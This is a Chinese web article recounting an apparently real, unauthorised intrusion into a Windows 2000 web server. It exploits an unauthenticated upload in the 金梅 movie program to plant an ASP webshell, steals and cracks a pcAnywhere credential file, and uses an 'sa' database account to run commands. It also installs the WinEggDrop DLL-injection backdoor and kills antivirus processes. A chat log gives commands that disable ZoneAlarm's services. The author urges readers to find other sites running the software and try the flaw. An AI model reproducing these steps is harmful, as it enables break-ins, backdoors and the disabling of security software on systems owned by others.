| VB 源码 | VC 源码 | ASP源码 | JSP源码 | PHP源码 | CGI源码 | FLASH源码 | 素材模板 | C 源程序 | 站长工具 | 站长教程 |

安全防范

木马病毒
黑客技术
系统安全
防火墙
安全防范

本类阅读TOP10

·双网卡共享上网解析
·常用端口对照详解
·技巧:多种途径访问局域网中的计算机
·代理服务器使用祥解
·在家远程控制公司的局域网电脑
·在Windows XP中共享上网
·最新奇迹私服复制漏洞大全(含98c)
·为什么局域网中机器PING通却不能上网?
·局域网共享资源安全防护大全
·远程破OICQ密码给工具QQExplorer ver 1.25介绍

站内搜索

一次比较困难的WIN2000渗透
这次渗透用到东西比较全面,写出来给大家参考,当中我走了不少弯路,粗心也有

漏洞:web程序漏洞。目标:获取管理员密码,并进入远程桌面

这里就不详细说这个web程序漏洞了,大家都知道的金梅电影程序uploadfilm.asp没过滤文件上传类型,并且不需要管理员认证!大家可以找找用金梅电影程序网站,试试这个漏洞,金梅4已经没有了。好了下面详细说说渗透过程

上传的asp木马是lcx的木马,红粉佳人(晕),木马的asp代码是加密的,这样可以躲过杀毒软件,嘿嘿

1,利用Serv-U 输入密码,看到了网站的全部文件,现在我得到了webshell第一件是就是看看他装的是什么ftpserver,在浏览器输入 ftp://www.domain.com 回显 serv-u 4.1 ready...什么的,嘿嘿,可能话可以用端口映射的方法获取admin,接着在asp木马输入net user,这里主要看看这个webshell有没有执行权限,很遗憾没有,端口映射得方法不能用!当然不会就这么放弃的
切换盘符: C盘 ,NTFS 做了权限不能浏览
浏览目录:  c:\progra~1 回车,浏览c:\Program Files ,看到了可爱的Serv-U,虽然我知道99.9%ServUDaemon.ini里面的密码是加密的,但还要看看,汗````加密的,再看看能不能写,无权限,死心了!!!!

2,利用pcanywhere
返回免FSO页 浏览目录 C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 发送命令
看到了一个账号PCA.sx365.CIF
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywherePCA.sx365.CIF copy D:\wwwroot\wwwdomiancom\wwwroot\ 发送命令
显示命令成功
浏览器输入 htpp://www.domain.com/PCA.sx365.CIF down下来了,用流光看到了密码 嘿嘿
赶快打开pcanywhere连接肉鸡,奇怪是密码尽然错误的,事后我才知道他的pcanywhere密码不是放在C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 里的!晕到

3,绝对意外的发现 到此可以放弃了,想不到什么办法了,于是我就准备下载他的电影数据库,看看管理员账号,弄个账号看看电影,打开articleconn.asp 一看,乐死我了,他用的是sql版本的金梅,哈哈哈,居然用的sa账号,马上打开mssql连接器连接,晕倒,连不上端口过滤掉了,还好最新版的红粉佳人带了sql连接,只能再次返回免FSO页,输入sa 和密码,执行cmd命令 net user
\\ 的用户帐户

-------------------------------------------------------------------------------
...................
嘿嘿可以执行
上传后门把
传至服务器已有目录: D:\wwwroot\wwwdomiancom\wwwroot\   Inject.exe 上传成功
传至服务器已有目录: D:\wwwroot\wwwdomiancom\wwwroot\   TBack.DLL 上传成功
这个是hotmail老师的wineggdropshell,我用的是个人版的,发行版的可能会被杀
下面执行sql_cmd
copy D:\wwwroot\wwwdomiancom\wwwroot\Inject.exe c:\winnt\system32  已复制
copy D:\wwwroot\wwwdomiancom\wwwroot\TBack.DLL c:\winnt\system32  已复制
Inject.exe -run
Remote DLL Injector V1.9 Private Version By WinEggDrop
.......
安装成功
打开cmd telnet www.domain..com 21221 晕倒连不上.......

4,突破防火墙 后门连不上,第一感觉对方用了IP 安全机制(其实不是用的IP 安全机制),来试试反向连接的后门吧,安装hotmail老师的portless ,安装没问题,但反向连接也没用,这时我临机一动
sql_cmd
net stop serv-u
重新配置后门端口为21,安装完成后
telnet www.domain..com 21 连不上,到此我知道肉鸡用了防火墙,55555
net start 一大堆服务 看得头大
还是看进程吧 上传了Process.exe(查进程和杀进程的小程序)
Process.exe
看到了norton 和瑞星 ,这个简单用Process.exe kill掉,然而瑞星的一个rtscan.exe 死活杀不掉
帮你改名 ren 路径\rtscan.exe rtscan.exe.bak
上传reboot.exe
reboot.exe /r  服务器重起了
这下你死定了,telnet www.domain..com 21221 连不上,汗,防火墙+IP 安全机制
telnet www.domain..com 21 竟然还是连接不上
哦!norton的又启动了 kill 掉norton的进程
telnet www.domain..com 21 晕倒连接不上
Process.exe 已经没有任何防火墙的程序了,连病毒防火墙都没有`````
见鬼了````难倒遇到了硬件防火墙!!!!!!!pcanywhere的密码又不对,晕阿

5,zonealarm  zonealarm一个超牛x的防火墙,再次Process.exe 我看到了 装在了 c:\winnt\system32\zonealarm
这个防火墙我不熟悉,问了一下hotmail老师得知安装成两个服务,一下是我和hotmail老师的对话

2004-02-20 04:18:25 阿新(Root)
我在农肉鸡
  

2004-02-20 04:36:20 WinEggDrop
又搞什么肉机了

2004-02-20 04:36:38 WinEggDrop
你看上眼的应该是"非一般"的肉机吧

2004-02-20 04:19:24 阿新(Root)
电影的

2004-02-20 04:25:03 阿新(Root)
我搞不定了  
  

2004-02-20 04:25:36 阿新(Root)
我删掉它的serv-u

wineggdropshell 改成21端口 还是不行

2004-02-20 04:43:11 WinEggDrop

有防火墙

2004-02-20 04:53:42 WinEggDrop
应该是有norton防火墙

2004-02-20 04:54:12 WinEggDrop
得停了那东西

2004-02-20 04:37:33 阿新(Root)
55555
  

2004-02-20 04:55:13 WinEggDrop
上传个sc.exe

2004-02-20 04:55:16 WinEggDrop
看看有什么服务

2004-02-20 04:55:24 WinEggDrop
norton防火墙能停的

2004-02-20 04:55:36 WinEggDrop
我记得是两个服务的

2004-02-20 04:55:42 WinEggDrop
一个是exe的服务,一个是驱动

2004-02-20 04:40:33 阿新(Root)
你到我的服务器上来

2004-02-20 04:40:58 阿新(Root)
终端的
  
2004-02-20 04:41:33 阿新(Root)
等你呢
  

2004-02-20 04:59:31 WinEggDrop
进去了

2004-02-20 04:59:39 WinEggDrop
你控制我,还是我控制你

2004-02-20 04:42:24 阿新(Root)
你连接我

2004-02-20 05:01:26 WinEggDrop
不是norton防火墙

2004-02-20 04:44:10 阿新(Root)
是什么
  

2004-02-20 05:01:33 WinEggDrop
是zonealarm

2004-02-20 05:01:40 WinEggDrop
更强的防火墙,等一下

2004-02-20 04:44:29 阿新(Root)
[;P] 找到就好 哈哈哈
  

2004-02-20 05:01:54 WinEggDrop
net stop vsmon

2004-02-20 05:02:05 WinEggDrop
net stop vsdatant

2004-02-20 05:03:13 WinEggDrop
net stop vsdatant /y

2004-02-20 05:03:43 WinEggDrop
上传sc

2004-02-20 04:46:29 阿新(Root)
有了
  

2004-02-20 05:04:03 WinEggDrop
呵呵,想到什么法子

2004-02-20 04:47:01 阿新(Root)
没有啊 我说SC有了
  

2004-02-20 05:04:33 WinEggDrop
sc config vsmon disabled

2004-02-20 05:04:40 WinEggDrop
sc config vsdatant disabled

2004-02-20 05:05:14 WinEggDrop
sc config vsdatant start= disabled

2004-02-20 05:05:25 WinEggDrop
sc config vsmon start = disabled

2004-02-20 05:05:31 WinEggDrop
太旧没用sc了

2004-02-20 04:48:42 阿新(Root)
把他的程序名改掉
  

2004-02-20 05:06:49 WinEggDrop
命令多了个空格呀

2004-02-20 05:07:01 WinEggDrop
sc config vsmon start= disabled

2004-02-20 05:07:07 WinEggDrop
start后面没空格的

2004-02-20 04:49:57 阿新(Root)
好了 哈哈哈
  

2004-02-20 05:07:20 WinEggDrop
两个服务都搞了吗?

2004-02-20 04:50:03 阿新(Root)
是啊
  

2004-02-20 05:07:25 WinEggDrop
重启应该就可以了

2004-02-20 05:08:04 WinEggDrop
不用改名也行的了,服务都被禁止了,呵呵

2004-02-20 04:51:14 阿新(Root)
重启了 哈哈哈

这下好了

有剪接,到此服务器完全搞定,最后告诉大家他的pcanywhere密码文件是放在 c:\progra~\sys什么的目录里的就是pcanywhere的安装目录!

当中有遗漏,因为我不可能一边渗透一边记录,that's all



相关文章
  • 九大数据库特点比较
  • PHP与JSP运行速度之再比较
  • Sql server中时间查询的一个比较快的语句
  • 常见数据库系统之比较 - Oracle数据库
  • 常见数据库系统之比较 - 数据库的发展和现状
  • 常见数据库系统之比较 - SYBASE 和 SQL SERVER
  • PHP 与 ASP 比较
  • 用PHP连mysql和oracle数据库性能比较
  • Dreamweaver和FrontPage比较,哪个好?
  • 相关软件

  • 文章中句子的处理与比较  
  • C语言编缉器的比较  
  • mymarket一个比较完善的PHP  
  • mymarket一个比较完善的PHP  
  • 一个比较简单的邮件列表程序,有订阅和退阅  
  • 红鸟自动链接,一套功能比较强大的自助友情  
  • 来自瓷都资讯的同学录系统,用户资料比较详  
  • 一个比较完整的源代码 定时提醒 1.0  
  • 一个功能比较完备的HTML文档编辑软件  
  • 这段代码演示将文件内容读入比较简单的方法  

  • 下载首页关于我们广告服务联系方式常见问题隐私声明法律条款本站声明下载帮助发布软件站点地图谷歌卫星地图